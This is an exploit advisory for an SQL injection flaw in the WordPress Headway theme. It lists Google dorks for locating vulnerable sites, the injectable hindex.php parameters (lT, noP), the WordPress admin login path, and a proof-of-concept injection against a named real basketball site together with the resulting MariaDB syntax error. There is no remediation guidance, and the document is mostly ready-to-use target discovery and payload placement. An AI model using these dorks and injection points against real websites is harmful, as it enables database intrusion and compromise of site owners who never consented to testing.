#######################################################################
Exploit Title : WordPress Headway Theme The Drag and Drop SQL Injection Vulnerability
Author [ Discovered By ] : KingSkrupellos
Date : 27/05/2018
Vendor Homepage : headwaythemes.com
Tested On : Windows
Exploit Risk : Medium
#######################################################################
Google Dork : inurl:''/hindex.php?lT=''
Google Dork 2 : intext:''Powered by Headway, the drag and drop WordPress theme''
Google Dork 3 : intext:''Proudly Powered by Headway and WordPress''
Exploit :
/hindex.php?lT=[SQL Injection]
/hindex.php?lT=[ID-Number]&noP=[SQL Injection]
Admin Panel Login Path => /wordpress/wp-login.php or /wp-login.php
#######################################################################
Example Site =>
cacbasketball.com/hindex.php?lT=1%27 [ Proof of Concept for SQL Injection ] => archive.is/UNxyP
Error Performing Query: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ')
#######################################################################
# Discovered By KingSkrupellos from Cyberizm Digital Security Team
#######################################################################